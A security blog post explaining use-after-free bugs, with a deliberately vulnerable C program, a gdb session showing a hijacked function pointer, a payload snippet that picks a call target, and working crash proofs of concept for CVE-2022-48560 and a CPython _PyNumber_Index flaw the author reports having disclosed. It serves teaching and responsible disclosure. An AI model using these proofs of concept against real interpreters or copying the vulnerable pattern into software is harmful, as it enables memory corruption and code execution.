Use-after-free: a CPython case study
In this blogpost we’ll be examining a vulnerability class known as use-after-free (UaF). We will describe what use-after-free is and how one might get to code execution, and then present a toy example in Python that I discovered personally.
Introduction to use-after-free
A use-after-free (UaF) vulnerability is a memory corruption vulnerability in which memory is used after being freed, i.e., a program accesses memory after its lifetime has ended, even though the allocator may legally reuse that memory for other purposes.
In userspace, we commonly use malloc and free to allocate and free memory.
The heap allocator must not hand out a chunk returned by malloc to anyone else, since the program is supposed to be using it.
However, once the program frees a chunk, the allocator may reuse it to satisfy a later allocation of a suitable size.
If that happens but the program somehow still uses the freed chunk through an old (dangling) pointer, interesting things can happen: unintended memory reads, memory writes, or even hijacked control flow and code execution.
As an example, let us consider the following C code:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

typedef struct _user_t {
    char name[16];
    void (*print)(const char*);
} user_t;

static
void
print_user(
    const char* name
)
{
    printf("User: %s\n", name);
}

int
main()
{
    user_t* u = NULL;

    // Allocate a new user with the constant name "Julian"
    u = malloc(sizeof(*u));
    (void)strcpy(u->name, "Julian");
    u->print = print_user;

    // Free the user
    free(u);

    // Allocate some other unrelated buffer
    char* evil = malloc(sizeof(user_t));
    read(0, evil, sizeof(user_t));

    // Greet user
    printf("Greeting user...\n");
    u->print(u->name);

    // Free unrelated buffer
    free(evil);

    // Return
    return 0;
}
- In this code, we have an object type called user_t which represents a user (this might look more natural in C++, but the pattern is still used a lot in production-level C code).
- The user_t type has a name (let’s ignore names longer than 15 bytes plus the NUL terminator for now) and a function pointer for printing the user’s name.
- In the main function, we allocate a new user u, set its name, and set its function pointer to a legitimate printing function.
- Then, we free the user. From the allocator’s perspective, the chunk that was previously allocated can be reused from this point on, i.e. if the address of u was 0x12345678, then after free the next call to malloc might return 0x12345678.
- Indeed, we allocate a new buffer called evil. Note that evil is not a user: it’s simply a buffer of the same size. I made it very artificial here (by using sizeof(user_t)), but normally you’d see something completely unrelated (think of malloc(24), for example). At that point, not only can the allocator return 0x12345678, it’s kind of encouraged to do so, to avoid fragmentation. Thus, evil gets the same address as u, and they point to the same memory chunk!
- The user can write arbitrary bytes to evil, which also overwrites u since both point at the same chunk. That means they can overwrite the user’s name and, more importantly, the function pointer!
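To make the reuse concrete, here is a toy model of a size-class allocator, written in Python. It is a sketch and not glibc’s implementation. The ToyAllocator class and its methods are hypothetical, sizes are not rounded into bins, and there is no chunk metadata. The one property it shares with real allocators such as glibc’s tcache is that freed chunks go onto a per-size LIFO list. As a result, the next request of the same size gets back the chunk that was freed most recently.

```python
class ToyAllocator:
    """Hypothetical allocator with per-size LIFO free lists (a toy, not glibc)."""

    def __init__(self, base=0x12345678):
        self.next_fresh = base  # next never-used address
        self.free_lists = {}    # size -> stack of freed addresses

    def malloc(self, size):
        stack = self.free_lists.get(size)
        if stack:
            return stack.pop()  # reuse the most recently freed chunk first
        addr = self.next_fresh
        self.next_fresh += size
        return addr

    def free(self, addr, size):
        # Real allocators read the size from chunk metadata; the toy takes it as an argument.
        self.free_lists.setdefault(size, []).append(addr)


heap = ToyAllocator()
u = heap.malloc(24)     # user_t: 16-byte name + 8-byte function pointer
heap.free(u, 24)        # u is now a dangling pointer
evil = heap.malloc(24)  # same size -> the chunk u still points to
print(hex(u), hex(evil))  # 0x12345678 0x12345678
```

Nothing in free() clears u, so in the C program any later u->print(...) reads whatever was written through evil.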
If we run it with such input, we’ll get a crash. Let’s run it under a debugger and provide 24 A characters as the input (on x86-64, sizeof(user_t) is 24 bytes: a 16-byte name plus an 8-byte function pointer):
bo@ipa:/tmp/uaf$ gdb ./uaf
GNU gdb (Ubuntu 12.1-0ubuntu1~22.04.2) 12.1
Copyright (C) 2022 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Type "show copying" and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<https://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from ./uaf...
(No debugging symbols found in ./uaf)
(gdb) run
Starting program: /tmp/uaf/uaf
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
AAAAAAAAAAAAAAAAAAAAAAAA
Greeting user...
Program received signal SIGSEGV, Segmentation fault.
0x000055555555528a in main ()
(gdb)
(gdb) x/i $rip
=> 0x55555555528a <main+147>: call rdx
(gdb) p/x $rdx
$1 = 0x4141414141414141
(gdb)
Note the indirect call (call rdx), which is typical of function pointers, and how rdx is completely attacker-controlled: 0x4141414141414141 is AAAAAAAA, since 0x41 is the ASCII code of A.
Of course, a real exploit would have to deal with mitigations like ASLR, which I described in a past blogpost, but I hope this example illustrates the dangers of a use-after-free bug.
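To see why 24 bytes of A end up in rdx, we can reinterpret the attacker’s input through a ctypes mirror of user_t. This is an illustration only. The User class is a hypothetical Python stand-in for the C struct. It assumes a 64-bit little-endian target, as in the x86-64 session above, where the name occupies bytes 0 to 15 and the function pointer occupies bytes 16 to 23.

```python
import ctypes

# Hypothetical ctypes mirror of the post's user_t (assumes a 64-bit target).
class User(ctypes.Structure):
    _fields_ = [
        ("name", ctypes.c_char * 16),  # char name[16]
        ("print", ctypes.c_void_p),    # void (*print)(const char*), as a raw address
    ]

# The 24 bytes that read(0, evil, sizeof(user_t)) copies into the reused chunk.
payload = b"A" * ctypes.sizeof(User)

# Reinterpret those bytes the way the dangling u pointer sees them.
u = User.from_buffer_copy(payload)
print(ctypes.sizeof(User), hex(u.print))  # 24 0x4141414141414141

# A targeted payload keeps a plausible name and chooses the call target instead.
# 0x401136 is an arbitrary example address; little-endian byte order is assumed.
targeted = b"Julian".ljust(16, b"\0") + (0x401136).to_bytes(8, "little")
v = User.from_buffer_copy(targeted)
print(v.name, hex(v.print))  # b'Julian' 0x401136
```

In a real attack, the chosen address would have to point at useful code, which is exactly where ASLR and CFI get in the way.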
A remark regarding CFI
Besides ASLR, modern systems employ Control Flow Integrity (CFI) solutions that treat indirect calls like our call rdx with special care. For example, you might see a special instruction, endbr64, in compiled C code: it marks an address as a valid destination for an indirect call or jump. It is part of Intel’s Indirect Branch Tracking (IBT), which, together with a hardware "shadow stack" that protects return addresses, makes up Intel’s CFI technology, Control-flow Enforcement Technology (CET).
Another example is Windows’ Control Flow Guard (CFG), which records allowed indirect-call destinations in a bitmap.
For now, I’d like to ignore those technologies to keep the discussion in this blogpost brief, but those technologies must be taken into account when developing a real exploit.
Python - motivation
I have a personal list of "things to look at", and a Python use-after-free was on that list.
Honestly, I was just inspired by CVE-2022-48560. You can read about it here, but in essence, it involved reference counting and callbacks.
In CPython (which is the C implementation of the Python programming language), every object has a reference count. The idea behind reference counting is simple: every time a new reference to an object is taken, we increase the count by one, and every time a reference is dropped, we decrease it by one. When an object’s reference count hits zero, we free it.
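The rule can be captured in a few lines. The following is a toy model in Python, not CPython’s code. ToyObject, incref and decref are hypothetical names standing in for an object header, Py_INCREF and Py_DECREF. "Freeing" just flips a flag so that later use can be detected.

```python
class ToyObject:
    """Toy reference-counted object (hypothetical; mirrors the idea, not CPython's code)."""

    def __init__(self):
        self.refcnt = 1      # the creator holds the first reference
        self.freed = False

    def _check_alive(self):
        if self.freed:
            raise RuntimeError("use-after-free: object was already freed")

    def incref(self):
        self._check_alive()
        self.refcnt += 1

    def decref(self):
        self._check_alive()
        self.refcnt -= 1
        if self.refcnt == 0:
            self.freed = True  # stands in for deallocating the memory


obj = ToyObject()  # a = C()   -> refcnt 1
obj.incref()       # b = a     -> refcnt 2
obj.decref()       # del b     -> refcnt 1
obj.decref()       # del a     -> refcnt 0, object freed
print(obj.refcnt, obj.freed)  # 0 True
```

In the real interpreter there is no flag to check. Code that still holds the pointer after the last decrement and touches the object is exactly the use-after-free this post is about. In the model, calling obj.incref() at this point raises RuntimeError.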
Here’s what it looks like in CPython under Include/object.h (after some cleanup):
#define PyObject_HEAD PyObject ob_base;
...
struct _object {
    Py_ssize_t ob_refcnt;
    PyTypeObject *ob_type;
};
This is the base of all Python objects: it has a reference count and a type. In the source code, you’ll see many Python object structs begin with PyObject_HEAD, which simply embeds this same header.
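As an illustration of that layout, the header can be read straight out of a live object with ctypes. This sketch relies on CPython implementation details. First, id() returns the object’s address. Second, it assumes a default 64-bit build (not free-threaded, not a Py_TRACE_REFS debug build), where the header is exactly ob_refcnt followed by ob_type. PyObjectHead is a hypothetical name.

```python
import ctypes

# Hypothetical mirror of struct _object; assumes a default 64-bit CPython build
# (not free-threaded, not a Py_TRACE_REFS debug build).
class PyObjectHead(ctypes.Structure):
    _fields_ = [
        ("ob_refcnt", ctypes.c_ssize_t),  # Py_ssize_t ob_refcnt
        ("ob_type", ctypes.c_void_p),     # PyTypeObject *ob_type, as a raw address
    ]

class C(object):
    pass

a = C()
# id() is the object's address in CPython; from_address views that memory in place.
# Note that `head` does not own a reference: it must not outlive `a`.
head = PyObjectHead.from_address(id(a))

print(head.ob_refcnt)               # current reference count of a
print(head.ob_type == id(type(a)))  # True: ob_type points at the class C
```

The comment about head not owning a reference is the same borrowed-reference hazard discussed later: if a were freed, reading head would be a use-after-free.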
As an experiment, here’s some Python code that shows the reference count and how it changes over time:
#!/usr/bin/env python3
import ctypes
class C(object):
    pass
a = C()
addr = id(a)
refcnt = ctypes.c_ssize_t.from_address(addr).value
print(f'Refcount: {refcnt}')
b = a
refcnt = ctypes.c_ssize_t.from_address(addr).value
print(f'Refcount: {refcnt}')
Note that the output is going to be 1 and then 2 - because we added another variable called b which points to the same address as a.
Of course, CPython’s C code itself also uses reference counting: for example, when a function is going to use an object, it increments the reference count (Py_INCREF), and then decrements it (Py_DECREF) when it’s done.
In CVE-2022-48560, the issue is in the heapq module in the heappushpop function, and here’s the vulnerable code (prior to the fix):
cmp = PyObject_RichCompareBool(PyList_GET_ITEM(heap, 0), item, Py_LT);
if (cmp < 0)
    return NULL;
if (cmp == 0) {
    Py_INCREF(item);
    return item;
}
The function compares heap[0] and item using the LT (less-than) operator.
This, in turn, might call a custom Python __lt__ method, which can empty the heap and thereby drop the last reference to heap[0]. This results in a use-after-free, since PyList_GET_ITEM returns a borrowed reference and no reference was taken on heap[0] prior to the comparison!
Here’s the Python code that reproduces the issue:
import heapq
class h(int):
    def __lt__(self, o):
        list1.clear()
        return NotImplemented
list1 = []
heapq.heappush(list1, h(0))
heapq.heappushpop(list1, 1)
Note the custom __lt__ method, which clears the heap. No reference to the heap’s first element (the h(0) instance) was taken prior to calling __lt__, so once the list is cleared, that element is freed while the comparison is still using it.
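The root cause is that a C function like heappushpop runs arbitrary Python code in the middle of its work. A harmless way to observe this is to have a custom __lt__ log its calls instead of clearing the heap. Traced and calls are hypothetical names for this sketch.

```python
import heapq

calls = []  # (self, other) pairs seen by __lt__

class Traced(int):
    def __lt__(self, other):
        # Runs in the middle of heapq's C code; here it only records the call.
        calls.append((int(self), int(other)))
        return int.__lt__(self, other)

heap = [Traced(0)]
result = heapq.heappushpop(heap, 1)  # compares heap[0] < 1 before popping
print(calls, result, heap)  # [(0, 1)] 0 [1]
```

Swapping the logging line for list1.clear() turns this harmless callback into the CVE reproducer above.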
So I went looking for something similar: custom callbacks that might free an object which is referenced later.
My find
I found this issue on the night of January 15th, 2026, and reported it on January 16th, 2026.
The issue can be seen in the _PyNumber_Index function in Objects/abstract.c:
PyObject *
_PyNumber_Index(PyObject *item)
{
    if (item == NULL) {
        return null_error();
    }

    if (PyLong_Check(item)) {
        return Py_NewRef(item);
    }
    if (!_PyIndex_Check(item)) {
        PyErr_Format(PyExc_TypeError,
                     "'%.200s' object cannot be interpreted "
                     "as an integer", Py_TYPE(item)->tp_name);
        return NULL;
    }

    PyObject *result = Py_TYPE(item)->tp_as_number->nb_index(item);
    if (!result || PyLong_CheckExact(result)) {
        return result;
    }

    if (!PyLong_Check(result)) {
        PyErr_Format(PyExc_TypeError,
                     "%T.__index__() must return an int, not %T",
                     item, result);
        Py_DECREF(result);
        return NULL;
    }
    // ... similar pattern continues
}
Let’s analyze it together:
- The item in _PyNumber_Index is a PyObject* and a borrowed reference. That is CPython terminology for a reference to an object that this function does not own: you are not allowed (by convention) to decrease its reference count, and it’s only guaranteed to be valid while the owner keeps it alive.
- After some checks, we call the nb_index function, which is really a function pointer that ends up invoking a custom __index__ callback, similar to how __lt__ can be customized.
- Later, there is a check that the result is exactly an integer and not a subclass (PyLong_CheckExact). If the result is not an integer at all, we format an error, and that error references the item (its type is printed via %T). That’s exactly the issue: my goal is freeing the item during my callback.
The gist: _PyNumber_Index implicitly assumes that item remains alive across the nb_index call, but that assumption is invalid because arbitrary Python code may run and drop the last reference.
So, I decided to compile CPython with ASAN (AddressSanitizer), which can conveniently be done with ./configure --with-address-sanitizer, and wrote the following proof of concept:
import array

class Evil:
    def __init__(self, lst):
        self.lst = lst

    def __index__(self):
        self.lst.clear()
        return "not an int"

lst = []
e = Evil(lst)
lst.append(e)
del e

arr = array.array('I')
arr.fromlist(lst)
The interesting part lives in the Evil class: the __index__ method clears the list stored in the instance and returns something that is not an integer, triggering the vulnerable error path. At this point, that list (lst) is empty.
To trigger it, I create lst holding an Evil instance and then delete the e reference, which means the only reference to the Evil instance is stored in lst. Since I clear that list in __index__, the Evil instance is freed once __index__ returns. The item pointer that CPython’s code still holds (a borrowed reference) therefore points at freed memory.
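To confirm the lifetime problem without touching freed memory, a variant of the PoC can return a valid int from __index__, so that _PyNumber_Index never reaches the error path that reads item. A weakref.finalize callback then records when the Evil instance is actually freed. This is a sketch for a regular (non-ASAN) build, and events is a hypothetical helper. Whatever fromlist does after the list shrinks may differ between versions, so any exception it raises is caught broadly.

```python
import array
import weakref

events = []  # order in which things happen

class Evil:
    def __init__(self, lst):
        self.lst = lst

    def __index__(self):
        events.append("__index__ called")
        self.lst.clear()  # drops the list's reference to self
        return 42         # a valid int: the error path that reads `item` is skipped

lst = []
e = Evil(lst)
lst.append(e)
weakref.finalize(e, events.append, "Evil instance freed")
del e  # lst now holds the only long-lived reference, as in the PoC

arr = array.array('I')
try:
    arr.fromlist(lst)
except Exception as exc:  # fromlist may complain that the list changed size
    events.append(f"fromlist raised {type(exc).__name__}")
events.append("fromlist returned to Python")
print(events)
```

The Evil instance is finalized right after __index__ returns, while fromlist and _PyNumber_Index are still running with the borrowed item pointer. In the original PoC, the error message then dereferences that pointer.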
Here’s the output from a CPython build with ASAN turned on:
==73525==ERROR: AddressSanitizer: heap-use-after-free on address 0x6130000300b8 at pc 0x0001013458a4 bp 0x00016ee396f0 sp 0x00016ee396e8
READ of size 8 at 0x6130000300b8 thread T0
#0 0x0001013458a0 in unicode_from_format unicodeobject.c:3075
#1 0x0001013436a8 in PyUnicode_FromFormatV unicodeobject.c:3109
#2 0x00010154d5c8 in PyErr_Format errors.c:1243
#3 0x0001010fe4e8 in _PyNumber_Index abstract.c:1433
#4 0x000109338334 in II_setitem arraymodule.c:411
#5 0x0001093427d4 in array_array_fromlist arraymodule.c.h:495
#6 0x00010114aeb0 in _PyObject_VectorcallTstate pycore_call.h:136
#7 0x0001014828ac in _Py_VectorCallInstrumentation_StackRefSteal ceval.c:1094
#8 0x0001014b4718 in _PyEval_EvalFrameDefault generated_cases.c.h:1785
#9 0x00010148180c in _PyEval_Vector ceval.c:2516
#10 0x00010148105c in PyEval_EvalCode ceval.c:1005
#11 0x000101646118 in run_mod pythonrun.c:1469
#12 0x00010163e6a0 in _PyRun_SimpleFileObject pythonrun.c:518
#13 0x00010163da30 in _PyRun_AnyFileObject pythonrun.c:81
#14 0x0001016ac948 in pymain_run_file main.c:429
#15 0x0001016aabcc in Py_RunMain main.c:772
#16 0x0001016ab9fc in pymain_main main.c:802
#17 0x0001016abba8 in Py_BytesMain main.c:826
#18 0x00019e4edd50 (<unknown module>)
When I reported the issue, I also reported similar issues in PyFloat_AsDouble and PyNumber_Long, all following the same pattern.
Summary
In this blogpost I showed what use-after-free is (without getting to full exploitation) and shared a toy example I discovered in CPython. I hope this demonstrates how dangerous custom callbacks are; in fact, many browser exploits targeting JavaScript engines use exactly these tricks to get to arbitrary code execution.
Stay tuned!
Jonathan Bar Or